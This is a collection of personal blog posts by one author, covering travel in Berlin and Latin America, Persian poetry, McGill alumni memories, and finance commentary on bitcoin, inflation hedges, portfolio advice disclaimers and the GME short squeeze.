I have been told that Berlin is fairly different from the rest of Germany and I haven't spent enough time in other parts of the country to debate that to any depth. It is quite a bit cheaper especially for a major city in Western Europe, and oddly enough one of the few countries I can recall where the GDP per capita is lower in the capital than elsewhere in the country. However, here is what I can confidently say about Berlin itself. The city is diverse, multicultural, safe, and gives out some of the most accepting vibes in any place I have been. I think people in Berlin go out of their way to be non-judgemental and understanding of others. I got to Berlin the day of Pride celebration walking around in Tiergarten, and it was an amazing first day to kickstart my love affair with the city. I spent the majority of my time in Mitte and Kreuzberg, and I am sure the other boroughs offer plenty as much.

Worth noting that this summer all of Germany's public transit system cost only 9 euros a month. Read that again. The entire country's transit system, including inter-city trains, cost a flat 9 euro to use per month for June, July, and August. The economist in me loves the arteries of public transit in a well-designed city, and Berlin has some of the best. One weekend I got the Museum Pass and went to just about twenty museums. A touch out of the way, but my favorite was German Museum of Technology. I would also rave about how great the food scene was, but in reality I ate doners for more than I'd like to admit, because I love them and they were everywhere!

Lastly, I would say that local knowledge significantly enhances your experience in Berlin. It is not just where to go, but what is expected from you especially going out at night. Huge shoutout to Jan and Farzana for some god-tier tips, to Maya for being my euro bff, and everyone I met at EastSeven with that incredible garden courtyard.

I love Berlin and will be back for sure. Prost!

Out of all the reasons to be bullish on Bitcoin, claims that it is an inflation hedge is the most puzzling one I have encountered. The argument usually makes a case that bitcoin is similar to digital gold (which we largely agree with), and traditional wisdom has it that gold is an inflation hedge.

That gold has been tossed around as an inflation hedge flies in the face of contradicting data. Historically gold has had a weak and unreliable relationship to realized inflation as measured by the CPI. The relationship even in the 70s and early 80s where gold was viewed as a reliable inflation hedge was weak and has become weaker since. The full sample correlation of gold returns to the change in CPI is less than 10% and a rolling correlation shows that it is fairly unstable. It is a piece of traditional wisdom that is simply false, yet it is still being propagated as true despite decades of evidence to the contrary.

Source: FRED, Interactive Brokers

You know what is an actual inflation hedge? Inflation derivatives! Breakeven Inflation Swaps. Treasury Inflation-Protected Securities. Turns out, you can actually trade inflation directly! Shocking, I know.

Source: FRED

Inflation derivatives are usually OTC instruments that require ISDA agreements in place and are not the easiest instrument to trade. So it is understandable if retail investors need to look to assets they can trade such as listed commodities, equities, or real estate to protect their wealth. Even then, the best inflation hedge available to retail investors is usually fixed-rate nominal debt. In other words, if you are a homeowner with a fixed rate mortgage at nominal rates below the prevailing inflation rate, you actually have a fairly great hedge in place that is benefiting from the higher inflation. This is especially true for US homeowners given the prevalence of 30-year mortgages with fixed rates that were as low as 4% in the beginning of this year.

To make things worse, assets without cash flow such as non-dividend paying stocks, gold, digital assets, etc. are more likely to be hurt by persistently high inflation given that it makes rate hikes more likely. Since the entirety of the value of assets without interim cash flows is in the terminal value, any steepening or rise across the yield curve would increase discount rates, i.e. lowering net present value. This is one of the primary reasons why they have performed so poorly in 2022 as the central banks have acted quite aggressively in tightening of their monetary policy to address inflation.

Bitcoin is a store of value similar to digital gold, but for the same reasons that gold isn’t an inflation hedge, neither is bitcoin. Trading them for inflation protection makes little sense, even more so when there are pure inflation instruments available to institutional entities and superior ones to the average retail investor.

This article was originally published on Firinne Capital during my time as Head of Research.

I will just continue travelling until I run out of money.

Said the Irish girl to me I had just met in my hostel in Madrid when I asked her about her travel plans. She just casually said that she was going to continue her travels without a set plan on her Eurail pass until she ran out of money and needed to get a job. At the time I was absolutely fascinated hearing that. For the overachiever hardcoded in my upbringing who had put his career above everything else in life, what she described was never even a thought to consider. What do you mean you’ll just travel whenever and wherever until you run out of money! To paint a picture, I started working the day after I graduated. I did not even go to my convocations (yes, more than one) because I was “too busy” working. What a foolish thought that was in retrospect.

Hearing that sentence is one of those moments that lives in my memory with a clarity that is hard to describe. The more I talked with her, the more I realized how different of a mindset she lived in than me despite the similarities in our backgrounds. She had an education and work experience with a free-spirited, warranted belief in her ability to get a job whenever needed. She did not need to live for some ever-moving payoff in the future that so many of us constantly chase. The more I have thought about this exchange over the years, the more I realized it was the first time I truly understood what it meant to “live in the moment”. In the eternal words of John Lennon: "Life is what happens when you’re busy making other plans.”

In a few hours, one day short of my maximum number of days allowed, I leave Colombia after three unforgettable months to go back to North America and take care of a few things before I continue this fantastic journey of digital nomadness. In the past eight months, I lived in Peru for two months, Mexico two and a half months, Costa Rica for a couple of weeks, and Colombia for three months. It has been journey of a lifetime!

When I started travelling in October 2021, I knew I would like it. After all I grew up with amazing parents who have a passion for the outdoors, travelling, and experiencing new cultures. I am forever grateful to them for instilling a deep sense of adventure in me from a young age. In many ways there is still a little kid inside that never grew up to be jaded by the realities of everyday life. Travelling gave me back the ability to wake up and be surprised by the adventure that each day's playground brings.

It is hard to put into words how incredible the past 8 months have felt like. The Inca trail to Machu Picchu lived far beyond the expectations. Isla Mujeres was truly the paradise it had seemed in pictures. In Holbox, I had one of the best weekends of my entire life. After travelling and partying till dawn everyday in Quintana Roo for a month, Yucatan was just a short bus ride which seemed like a whole different side of Mexico. Medellin, the city of eternal spring, felt like home from the minute I set foot in it. With an amazing group of people not only we went to Carnaval in Barranquilla, but ended up in it on a float for a full day! To give you the tldr: I truly loved every minute I spent anywhere I was, because, well... digital nomadness gives you that superpower that you can just about be anywhere you wanted to!

I have met some incredible people along the way that made even the most ordinary places extraordinary. Having travelled solo, I have rarely felt lonely even for a second. Special shoutout to the Selina family who I have travelled with the majority of the last eight months. The community of digital nomads you have built is incredible! I loved it so much so that I decided to try my hands at making community instead of just being a part of it by being a community resident in Selina Medellin.

I have been a community builder most of my life. The residency in Selina Medellin filled that gap I had been feeling since I stepped down as the co-president of the McGill Alumni chapter in Toronto. When I first started my travels in Medellin in October 2021, I met an incredible group of people who welcomed me with opens arms and I count several of them as my closest friends now. The incredible staff became my friends and family away from home. That positive experience was so formative that I have constantly tried my best to pay it forward.

It is a funny feeling, the world actually feels smaller when you are travelling and constantly meeting people. You realize you are meeting some of the best people from each place who share a common sense of adventure and curiosity that bonds all of us together.

As a community resident I was often the second person the nomads met after checking in at the front desk. Fellow travellers quickly would become friends. Shared experiences became a bond that kept the community not just together but had nomads coming back over and over for it. It was a fair amount of work (definitely overtime for my liver!) but receiving heartwarming comments that I had made a positive impact on their journeys, enabling them to make friends in a place they had known no one before, and that they had stayed far longer than originally intended because they did not want to leave the community was always the prized payoff that felt amazing.

To all the incredible people I have met during my travels these past months, thank you with all my heart for being part of my journey and my life! Your companionship made obstacles of any size seem trivial. I have felt some of the happiest moments of my life in your company. The time we spent together might seem fleeting, but the memories have been forever etched into my life's journal. I have no doubt we will continue to run into each other over and over again.

And then, we will pick things back up right where we left them.

Quoting my favorite literature teacher growing up:

The world is a rose. Smell it and pass it to your friends.

There is a lot of poetry that I have deeply enjoyed reading over the years. Growing up in Iran where poetry is an integral part of the culture left a lasting impression on me. As Nowruz came to pass this year, I visited some of my favorite poems to celebrate the new year. There are pillars of the Persian classical literature who are most famous such as Ferdowsi, Rumi, Saadi, Hafez and Omar Khayam among others. Most of my favorite Persian poetry however comes from the contemporary poets that I adored reading growing up. To name a few: Ahmad Shamlou, Forugh Farrokhzad, Sohrab Sepehri.

My favorite Persian poet of all time is none other than Hamid Mossadegh. Below is a poem I remember fondly reading as a 13-year old madly in love with a girl in our family friends' circle. It is a love story for another time. I am not entirely sure whether the lasting impression of this poem is because of how I remember my first love (To quote Dumbledore: "Oh, to be young and feel love's keen sting!" ;) ) or whether I would have felt the same reading it years later. Nonetheless, here it is in Persian and my best attempt at translating it. May the language Gods forgive me for my mistakes.

حمید مصدق/خرداد ماه 1343:

تو به من خندیدی و نمی دانستی
من به چه دلهره از باغچه همسایه سیب را دزدیدم
باغبان از پی من تند دوید
سیب را دست تو دید
غضب آلود به من کرد نگاه
سیب دندان زده از دست تو افتاد به خاک
و تو رفتی و هنوز
سالهاست که در گوش من آرام آرام
خش خش گام تو تکرار کنان می دهد آزارم
و من اندیشه کنان غرق در این پندارم
که چرا باغچه کوچک ما سیب نداشت...

You laughed at me
little did you know
the dread with which I had stolen
that apple from our neigbour's garden.
The gardener chased me away angrily
seeing the half-eaten apple in your hands
looked at me with rage-filled eyes.
The bitten apple rolled off your hands onto earth
and off you went...
But it's been for years
still ringing in my ears
softly
softly
the rustling of your footsteps away
tormenting me over and over again
drowning me in my own thoughts
wondering why our own little garden
had no apples...

This week I stepped down as the co-president of the McGill Alumni Association of Toronto (MAAT). I don’t live in Canada let alone Toronto anymore, so it made sense to pass the mantle to the next capable pair of hands (Joya and Umaid, you two rock!) after staying on an extra year due to the pandemic. Somehow I found myself quite emotional as I attended my last meeting as co-president with our amazing board online.

If you have spent any amount of time with me, you would know that McGill and Montreal are a huge part of my identity. I still have my 514 cell phone number, the only one I have ever had. Before the pandemic forced the longest lockdown worldwide on us in Toronto, I used to go to Montreal several times a year for events and of course the annual pilgrimage to Osheaga. With the MAAT, we had a variety of events throughout the years including a few epic McGill 24s and holiday parties. When I moved to Toronto in 2012, the MAAT welcomed me with open arms, and I loved it so much that became a board member and eventually joined the executive team alongside my favorite co-president Jamie Lee. I truly hope that throughout the five years in various roles in the alumni chapter, I passed it on better than I found it.

I arrived in Montreal as a goofy international student with a weird accent and lots of lessons to learn. It was the first year I was living on my own, and I was so unsure of my place in the world. Growing up as an unhappy teenager in Iran hadn't exactly given me the chance to discover the hidden social butterfly in myself. Insecure and timid, I arrived in Montreal a few weeks early to prepare myself for my first year.

It was love at first sight. What a truly magical place. Montreal is beautiful! The people, are some of the most welcoming, open-minded, and non-judgemental I have ever met. No one cared where I came from or whether I grew up in Canada. Everybody was from somewhere and it didn’t matter. One of my first memories is the time a biker with an epic beard I was playing pool with at a bar on St. Denis explained to me what “tabarnak” meant while he bought me a beer and simply said “Welcome to Montreal!” I had never felt more at home with a group of strangers up until that time.

The first week that I arrived at McGill, I attended the majestic clusterfuck that is known as Frosh. I met plenty of people from places where I had only read the name on a map. I made more friends I could keep track of. To this day, it is one of the fondest memories of my life. I remember during science frosh one of the speakers said that most people admitted to McGill are the top student in their high school class. He said that if you look to your right and to your left, one of them is likely smarter than you. Once classes started and things kicked into gear, I truly understood what he meant. McGill's students are brilliant. They are some of the smartest people I ever met in my life. To this day I’m not so sure how we partied so hard and still excelled in academics.

It is hard for me to overemphasis how much of my life trajectory I owe to the combination of McGill and Montreal. I cannot even imagine who I would have been otherwise. It was so formative in my life that I wouldn't be half the person I am without those fours years spent learning from everything and everyone. I learned that every Quebecer in a better skier than me. I worked in the best job I ever had in my life in the McGill Athletics gym. I became friends with some of my favorite professors (Hi Sujata and Larbi!). I met plenty of lifelong friends there, even some by accident. To this day I am glad that I joined the Sigma Chi fraternity thinking that the ΣΧ letters indicated some sort of mathematics society. rofl indeed! No one ridiculed me for having thought that. I had no clue going in. In that house on University Ave, I found a strong brotherhood I have cherished to this day. I also joined the mathematics society on another day :)

Montreal and McGill let me discover myself in a welcoming and curious environment. I truly found myself in those four years. Countless hours we spent talking to each other in Molson’s hallways, sitting in the lower field, or apartment crawls in the ghetto. The beer pong skills have won me more friends I can count, the dance moves at Café Campus, not so much I’m afraid! I am forever grateful to have had the chance to be a student in the best school in the greatest student city I have even heard of. My life has been enormously better because of the experience, both as a student and as a lifelong alumni.

To the board of MAAT, thank you for having me the last five years with all my heart. Through the pub nights, send-off events, welcome back patio nights, walking tours, holiday parties, networking series, career events, and a myriad of other events over the years, I have loved being part of our alumni community every second of it. I hope my contributions have been worth at least a fraction of what you have given me.

514 always and forever,

Kaveh

The narrative of “bitcoin is digital gold” has been around for some time. Of all the frameworks used to value bitcoin, it is one of the few we consider having a number of economic merits supporting it. After all, Bitcoin’s seminal whitepaper itself does reference a similarity to how Bitcoin is mined:

The steady addition of a constant of amount of new coins is analogous to gold miners expending resources to add gold to circulation. In our case, it is CPU time and electricity that is expended.

In this narrative, with the price of gold hovering around 1,800 USD per oz, dividing the total market capitalizations of gold to bitcoin can give estimates ranging from 140k to 500k per bitcoin depending on what you consider to be gold’s available supply.

JPM uses only private gold to arrive at the lower range, whereas Guggenheim uses almost all known gold. While we can heavily criticise this relative valuation framework, the most glaring issue being an implicit assumption that the market has priced gold correctly and bitcoin incorrectly at the same time, let’s first compare how bitcoin stands up to gold in being a store of value.

A store of value, after all, is some asset that can be saved today in order to be exchanged for goods and services in the near or distant future holding more or less the same value it has today. Gold and to some extent Silver have been humanity’s primary stores of value even in distant civilizations who would have never met each other. A store of value has ten important characteristics: scarcity, durability, acceptability, fungibility, divisibility, stability, portability, verifiability, and to break the rhythm, ease of storage, and finally privacy. Let us now discuss how Bitcoin ranks versus gold.

Scarcity is without a doubt the most important characteristic of a store of value. An asset in abundance cannot be a store of value because then its value will be dictated by the prevailing supply and demand forces at any given time as opposed to now versus near or distant future.

All the gold mined in history sums to about 200k tonnes with another 55k tonnes in known reserves. It is most definitely rare. If every single ounce of this gold were placed next to each other, the resulting cube of pure gold would only measure around 21 metres on each side.

Bitcoin has a fixed supply of 21m coins, and we know exactly the quantity mined at any given time. The common criticism that anyone can fork Bitcoin, so technically it has unlimited supply, is a flawed and tired argument that we will address in depth in a later post.

Winner: Bitcoin, with the slightest margin.

A store of value needs to be valuable in near or distant future, hence the requirement for durability. Gold is nearly indestructible with low reactivity with other elements. In short, gold stays gold in most environments and use cases.

Bitcoin since 2009 to this date has been operational more or less in the original form that Satoshi envisioned. After Segwit in 2017, the next major upgrade, Taproot, took four years to arrive. The base layer of Bitcoin is extraordinarily boring, and while that would be problematic for the breakneck speed of development in Web 3.0, it is perfectly fine for a store of value.

A blockchain that keeps doing hard forks is not durable, and would make a poor candidate for a store of value. Frequent hard forks might be a virtue for innovation, but they are a vice to anyone looking for a digital store of value.

Winner: Tied

A store of value without worldwide acceptability cannot be of much value. Gold has a history of being acceptable as old as humanity itself. Bitcoin while becoming increasingly accepted, is still only just over a decade old and has a long way to go.

Winner: Gold

Commercially traded gold has to meet strict specifications. In that sense, all commercially-traded gold is fungible. All bitcoins are interchanged with no way to discriminate within the network.

Winner: Tied

Divisibility is one reason real estate doesn't make a good store of value. Gold can be sold in any denomination required, although publicly-traded gold has to meet specific requirements. Although dividing up gold is certainly possible, it requires some specialized tools and is not a skill available to every person. Furthermore, the price generally tends to go up for smaller amounts of gold in retail markets.

The smallest unit of bitcoin is a Satoshi at 1/100 millionth of a bitcoin. No matter how it is divided, the price scales linearly with the divided amount.

Winner: Bitcoin

A store of value is meant to store value, not to be the main bet in a portfolio. Gold certainly has its bouts of volatility, but has much lower volatility compared to bitcoin. While bitcoin’s volatility has been on a somewhat downdrift from the low triple digits, since 2013, it has averaged roughly 80% annual volatility to date. Over the same time period, spot gold has experienced 15% annual volatility.

Historical Volatility - Bitcoin vs. Gold. Source: Interactive Brokers, CoinGecko

The downward drift in Bitcoin’s volatility is almost sure to continue as it becomes more of a macro risk asset and integrated into the financial systems via an ever expanding spot and derivative market, but we are still quite some time away from seeing gold-level volatility for bitcoin.

Winner: Gold

Gold is mostly traded in some predetermined form, such as ounces or bars. It is however expensive and difficult to transport from one point to another. With Bitcoin, especially with advancements in the lightning network, it is as easy and fast as you can blink.

For significant value, Bitcoin wins by a landslide since the transaction fee is agnostic to the size of the value transferred. There have been a handful of billion-dollar transfers in history that cost less than $50 USD to transfer.

Winner: Bitcoin

In order to be acceptable for an exchange of value, one needs to be able to verify the authenticity of the store of value asset itself. How many people do you know that can hold a gold bar and tell you whether it is authentic or not within seconds? With Bitcoin, you can get as many network confirmations as you are willing to wait for.

Winner: Bitcoin

Gold is moderately easy to store. Remember, all the gold in entire human history can fit in a cube only 21m per side. While the environmental requirements for storage are light, gold requires heavy physical security. For bitcoin, your private key is all you need to protect it. In your head even if you can memorise it.

Winner: Bitcoin

Hardly anyone holding significant amounts of gold would like to advertise such a fact. Gold can provide perfect privacy especially if melted to indistinguishable pieces and erasing any trackable information.

One of the most irritating false narratives that the media keeps perpetuating about Bitcoin is that it is some completely obscure parallel financial system where only illicit transactions take place. In fact, Bitcoin is pseudonymous, and it makes a poor choice for anyone trying to cover their tracks. Ever seen a drug deal go down with parties preferring to scan QR codes as opposed to taking cash?

While identities are not linked to addresses, by the virtue of blockchain being a public ledger it means that every transaction is available for everyone to see. Just ask those FBI agents their opinion about Bitcoin’s anonymity.

Winner: Gold

With 5 wins for Bitcoin, 2 ties, and 3 wins for gold, we think Bitcoin is a slightly better store of value. While the categories are not of equal importance, it is not exactly a secret that the younger generations have embraced digital assets far more than their elders. This is a pattern that is likely to continue as the world of perpetual QE and any imaginable kind of stimulus pushes more people to look for stores of value for their wealth. Bitcoin has proved to be an excellent candidate deserving of consideration alongside gold in that regard. The prevalence of BTC on Ethereum is testament to the excellent properties of Bitcoin as an unbiased store of value.

While the blockchain technology is still frequently and erroneously equated to Bitcoin, it is important to note that the Bitcoin whitepaper pioneered blockchain as a technology and bitcoin as its first and most well-known use case. A truly remarkable achievement for a new technology to mostly get it right, the first time!

This article was originally published on Firinne Capital during my time as Head of Research.

My default response whenever I get asked why I am passionate about travelling as a digital nomad is: "Cause life is short, and the world is wide!"

Having the ability to largely choose where to be whenever you want, at times feels like I have gained a new superpower. It almost doesn't feel real. Waking up every morning to a world that is your playground waiting to be explored. For you to choose your own adventure. Being a digital nomad certainly has its drawbacks (#1: wifi will rule your life!) but for the wanderlust type once you have tasted it there is no going back.

Travelling is a humbling and character-building experience. I don't mean the all-inclusive type where you spend your "two weeks" on vacation. I mean living in a place for a few months at a time and appreciating its beauty. Making a few local friends, going to the cultural sites, hitting the local spots, making an effort to learn the language, and developing an understanding of the culture beyond whatever stereotype the media portrays.

It is a phenomenal way to understand the toxic level of consumerism that plagues much of the world. I have been travelling for months without a Walmart in sight, no Amazon Prime with one-day delivery, and haven't set foot in a generic copy/paste of a McDonalds or Starbucks... and it has been fucking great.

Having only a backpack to jam all my belongings in has done wonders in making me mindful of what it is that truly matters. I may lose what I have any day of the week, but the memories of watching the sunset standing on a cliff in Santorini or the overwhelming sense of happiness atop Wiñay Wayna, are mine forever to keep.

When you meet fellow travellers, you mostly connect talking about their adventures and what they want to do in their lives. Not their fancy clothing, shiny watches, branded accessories, or whatever bullshit industry jargon they throw at you. There is little hollow small talk about "the game", "the kids' school", or "last weekend up north" or whatever topic is safe to speak in a corporate environment. You get to know, right from the start, the content of their character.

Having lived the bulk of my adult life as a suit I know what it feels like to slip into the comfortable numbness of a routine. No boundary is pushed when you are in your comfort zone. You do not learn. You do not grow. One's character is rarely tested in the security of a familiar repetitious routine. Travelling in unfamiliar places forces you in situations where the strength of character gets tested, and that includes your own. You will be surprised. You will feel happiness, loneliness, uncertainty, and even sorrow at times.

In the end, you will be a better person for it.

Now that we got deep and personal, before you go, sing with me one of my favorite tunes that sums up a key part of my life's philosophy:

🎵 I wanna taste love and pain
Wanna feel pride and shame
I don't wanna take my time
Don't wanna waste one line
I wanna live better days
Never look back and say
Could have been me
It could have been me 🎵

“This is not investment advice.” is the phrase you come across frequently navigating any media dealing with investments. It is also the source of frustration for many of my friends where the conversation goes something like this:

“Do you own [xyz]?”
“yes”
“Think price is going up?”
“yes, probabilistically speaking”
“Should I buy it?”
“Not sure, it depends on your investment objective.”
“But you just said you think the price goes up?”
“Yes, but I cannot give you investment advice.”

Afterward there is usually some further back and forth that ends in a phrase said in frustration that basically sums to:

I just want to make some money.

Before I dive into why it is not investment advice, unless specifically from someone you have engaged to give you investment advice, let me tell you this with the same level of conviction I have about the existence of the sun and the moon:

No one, and I literally mean no single human being alive or ever lived, can tell you whether purchase of an investment is guaranteed to make you money.

If they do, run away. They are either delusional, or running a Ponzi scheme. No exceptions.

Now that we got that out of the way, let me state why that phrase should always be included, is frequently ignored, and occasionally frustrates audiences:

If you are the finance type, you may refer to this simple rule as portfolio construction, or risk budgeting, or portfolio optimization. Any investment decision requires three vital inputs: target returns, risk tolerance, and constraints. Let’s see what each means with concrete examples:

Target return is not a choice per investment. It’s a portfolio decision, i.e. it includes all of your investments. Sure, each investment would include a target return, but it is the impact of the inclusion of any investment in the portfolio that is important. No matter how bullish you may feel about the hottest tech stock, if the entirety of your stock portfolio is technology, then it is more likely than not that adding another tech name is not the right decision.

Modern Portfolio Theory is one of the simplest portfolio construction frameworks which got its inventor the Nobel Prize. It demonstrates mathematically the old adage that “putting all your eggs in one basket” is a terrible idea.

It is still one of the most widely used frameworks. One of its best insights that is at first counterintuitive, is that including inferior investments with lower expected returns is optimal if they reduce the overall risk of the portfolio measured by its volatility.

Surprisingly this is a hard one to explain. For any single person, your financial worth is not just how much money you have. Your net worth should be viewed as your investments minus liabilities plus your human capital.

Think of human capital as the present value of your potential lifetime earnings. All else equal, who do you think has the higher human capital here: An investment banker earning 250k a year, or a surgeon earning 250k a year?

The investment banker’s earnings likely consists of mostly a bonus, which is often discretionary, fluctuates with swings in the financial markets, likely has a vesting period, and is far more likely to be fired in an economic downturn than a surgeon.

The investment bankers should invest in safer assets uncorrelated with their income stream, such as unlevered real estate. The surgeons with a large and fairly certain human capital ahead should use leverage judiciously and invest in far riskier assets such as venture capital. Yet, in reality the portfolios I see are the exact opposite of what they should be.

Constraints are not just about being able to access investments. The accredited investor qualifications required to invest in private funds in my view are well-intentioned, but outdated, regulation that over the years have made many of the best investment vehicles inaccessible to the average investor. Leaving out the obvious constraints such as legal, geographical, and accessibility constraints aside, there are also considerations for things such as cash flows, tax, and liquidity that are often ignored. If you are carrying any high interest credit card debt, it really doesn't matter how much you think your next hot tip is going to rip. Pay your credit card debt first.

I know it can be frustrating to hear phrases such as “it depends”, or “I cannot give you investment advice”. Next time you hear them, take comfort in knowing that it said with good intentions and a healthy understanding of portfolio management theory.

Oh, and duh, also as a legal disclaimer in case a securities regulator comes knocking… :)

This article was originally published on Medium.

The last article I wrote on GME was to avoid repeating myself to every single person who was directly asking me what is happening with r/wsb stocks. A month later, we are having an encore.

Like before, I will only focus on the market microstructure aspect of this pop and leave out the political/social commentary to people who are more well-versed than me.

In the last article, I mentioned that the r/wsb crowd had understood that in order to repeat their epic short + gamma squeeze on GME, they had to find stocks with these three characteristics: 1- High short interest, 2- Active option market, and 3- Illiquid stock.

In this latest run, the crowd has found another valuable tool in their market microstructure toolkit: After-hours trading.

I have marked the start of the after-hours trading in GME on February 24th in the chart below. Note the price and volume action after the dotted orange line, we will come back to that later.

First, let us see how those three characteristics have changed for GME in the last month:

1. Short Interest — GME’s short interest is down massively from over 100% of the float shorted to about 30%. That is a huge relief to any short squeeze attempt. While still a relatively high ratio, 1/3 of float sold short is not out of the ordinary.

2. Active Option Market — The option market on GME is alive and well. That said, with periods realizing well over 300% annualized volatility, the options’ implied volatilities are extremely high, and the bid/ask spreads are quite wide. In plain English, this means that the option sellers have substantiality raised the prices at which they are willing to sell options.

3. Illiquid Stock — The stock is more liquid than before, mostly due to the short interest coming down. With a ~50m float, it frequently trades the entire float in 2–3 days which is atypical to say the least.

The regular trading session for US equities on NYSE is between 9:30am EST (i.e., market open) and 4pm EST (i.e., market close). The after-hours trading starts 4pm EST and ends at 8pm EST. The most important thing to note about after-hours trading is that the liquidity (i.e., available volume of stock to trade) is far below what trades during regular trading hours as the number of participants drops significantly with reduced risk taking across the remainder.

This drop in liquidity is the critical part that the latest pump on GME’s stock has capitalized on. There clearly is a strong understanding of market microstructure in these moves. It takes an order of magnitude fewer dollars to move the stock price around after hours, but the price is sticky. This is especially relevant to the option sellers who would have been “hedged” at market close, but overnight have seen the price move enormously against them and now must buy an order of magnitude to hedge themselves.

On top of that, there are expiries in option on GME for this Friday, February 26th. The option delta (i.e., sensitivity of the option’s price to the underlying stock’s price movement) increases exponentially as you get closer to expiry. A $100 Feb-26 call on GME was trading 3 days ago at around 25c as it was likely going to expire worthless out of the money. On Thursday, it traded as high as $90 as the stock price blew way past the strike of an option that is one day from expiry. That is a return of 360x.

It means that the people coordinating on these efforts are smart and have a solid grasp on the mechanics of the market microstructure. They have used the thin liquidity in the after-hours trading to push the price up massively right before the expiry of options.

The after-hours trading is a valuable tool for market participants to manage their risk after the market’s close. Most exchanges have some form of after-hours trading to help market participants access liquidity as the news cycle develops. Like any tool, it can be used for good or bad.

This is not investment advice. All opinions are my own, and you should do your own due diligence, as always.

This article was originally published on Medium.

A common question I receive is: “What stops anyone from cloning Bitcoin and starting their own cryptocurrency?“ Most common reaction is a tie between confusion and shock when they hear my answer: “Technologically, nothing at all.”

Bitcoin has a hard supply cap at 21m. If there is nothing stopping anyone from launching another cryptocurrency, then cryptocurrencies as a whole must have an unlimited supply despite limited supply for any single one of them.

As a matter of fact, in the 2017 ICO gold rush many “alt coins” did exactly that. A quick fork of Bitcoin’s repo and an accompanying “white paper” with little to no technical detail was all that it took. Almost none survived. A handful such as Ethereum with true innovations and long-term vision stuck around and are thriving more than ever. Few are competing with Bitcoin directly. Most are building on top of it.

Several high-profile challenges to Bitcoin itself with the aim of improving its limitations (e.g., block size, arguably the most contentious issue in the history of Bitcoin) have failed to gain adoption anywhere near the scale of Bitcoin.

Networks are inherently “winner-takes-all” markets. Users tend to flock to places where the other users are. Think of how dominant of a social network Facebook is, anticompetitive arguments aside. There is only one Craigslist, despite having the looks of a website from the 90s. The basic technology behind either is neither proprietary nor insurmountable for a handful of developers to build something similar, if not better. Then why is Craigslist or Facebook still the largest in its space? Why aren’t there several clones of Facebook?

Bitcoin has become the store-of-value layer in cryptoassets. A remarkable achievement for a 12-year-old innovation that introduced Blockchain as a technology and Bitcoin as its best-known use case. Bitcoin is older than Uber. It is older than Snapchat. Somehow it still gets classified as an emerging or unproven technology despite its resilience over a decade.

Since early 2020, every month seems to bring yet another large institution which has invested an eye-popping amount in Bitcoin. Tesla’s $1.5 billion announcement today ranks as one of the largest I have seen thus far in corporate holdings.

Bitcoin now acts as the value layer in cryptoassets. This is partially why it gets labelled as “Gold 2.0” or “Digital Gold”. There is an enormous amount of value locked in cold storage, and an ever-increasing amount now lives on the Ethereum blockchain moving between various DeFi platforms looking for high yields in a world starved of it.

Almost all DeFi development is happening on the Ethereum blockchain, which is why I think Ethereum is the digital oil of cryptoassets. Ethereum still has a long way to prove its viability and certainly has formidable contenders should Ethereum 2.0 fail to realize its vision.

As for the unbiased value layer in cryptoassets, Bitcoin takes all.

This is not investment advice. All opinions are my own, and you should do your own due diligence, as always.

This article was originally published on Medium.

My phone has been buzzing almost every minute for the last three days with my friends asking what is going on with GME, what call strike is going to give them 10x, and whether Blackberry, AMC, or Tootsie Roll is the next GME.

I have traded options both professionally and personally for over 10 years by now. I will try to explain in simple terms what is happening with GME, and yes, whether you should buy some calls to YOLO or not.

By now you must have read that GME, a failing physical game distribution company in the age of Steam and Epic Store, has ripped 18x in just a month. There is plenty of articles how deepfuckingvalue turned a $50k investment to almost $50m by now, at least on paper.

First off, this has nothing to do with GME per se. This is not a fundamental play on the company’s prospects. Rather, it is a bet on market microstructure, and an amazing one at that!

GME has had the jet fuel of two of the market’s greatest disruptive forces combined all in one: a short squeeze, combined with a gamma squeeze.

There are three characteristics that have made this possible:

1. Short interest — short interest is how much of the stock’s publicly available float have been borrowed and sold on the open market. GME has a float of roughly 50m shares. Almost the entire float has been shorted for months. This makes it a perfect candidate for a short squeeze if the borrowers must give back the shares they had borrowed (also known as covering your short). This can happen if the lenders call back their shares, or most often, if you lose money on your existing short positions so that you have to buy back the shares to bring your account into good standing.

2. Active Option Market — Options are inherently levered instruments. The buyer of a call option has the right (but not the obligation) to buy a certain asset at a predetermined price, usually at a fraction of the face value of the options. On January 19th when GME was trading about $40 a share, you could have bought a call on GME with a strike of $60 expiring on January 29th for $2. That gave you the right to buy GME at $60 on January 29th regardless of the price. At the time of this writing, GME is trading around $300, meaning that your expected profit is approximately $300 — $60 (what you will pay at expiry) — $2 (what you paid for the option) = $238. Your initial investment was $2. That is the power of leverage.

   Now the sellers of options only care about the volatility of the underlying and engage is an activity called “delta hedging” to neutralize the impact of asset movements on the options. This is not easy to explain without getting into the mathematics of how options are priced, but just know this: The seller of an option (short gamma in trader terms) will virtually always trade in the direction of the market. That means the sellers of the stock options buy more stock when the stock’s price goes up, and sell more when the stock’s price goes down. This means that they will amplify market moves even further for large orders.

3. Illiquid Stock — Now this is where the first two points meet and why the moves in names like GME are nothing short of extraordinary. The retail investors energized by r/wsb have been buying an enormous amount of call options on GME. As they buy call options, the sellers of the options have to buy more stock to “hedge” themselves given that the price has been going up. GME’s stock is quite illiquid (meaning hard to find) given the high short interest.

See where this is going? It means that there is a feedback loop as more retail traders buy more GME call options, but there isn’t enough stock around to buy, so you have both the shorts covering their positions, plus you have option sellers who have to buy more stock to hedge themselves, pulling the price higher, and then it just repeats itself.

Normally in deep liquid markets the impact of all this is manageable. The beauty of the last few weeks is that the retail traders led by deepfuckingvalue have understood that in order to repeat this they only need to find stocks that have these three characteristic: high short interest, active option market, and illiquid stock.

As with any investment decision, the only way to say anything meaningful is if there is a full portfolio context. This rotating squeeze can continue for a few more days or even weeks, but unless you have a deep understanding of market microstructure and how derivatives work, I would recommend shying away from putting any real money to work here.

This is a worthless forecast, but I will do it anyways: It will end up with GME crashing back down. Right now, we are at “peak hype” so it can certainly go up to over $1,000 a share, but for a company that is currently at $25bn market cap, with $5bn of revenue (and falling for years), and negative net income there is no justification for the price. This forecast is worthless, because I cannot tell you when it will happen, and that is all that matters.

Options are a valuable instrument in most portfolios, but they are complex products and should not be traded without at least a basic understanding of how they work.

Now before you jump headfirst into buying options, just know that on average the buyer of an option is guaranteed to lose money over time. There is about three decades of proven track record on this phenomenon called Variance Risk Premium.

This is not investment advice. All opinions are my own, and you should do your own due diligence, as always.

This article was originally published on Medium.

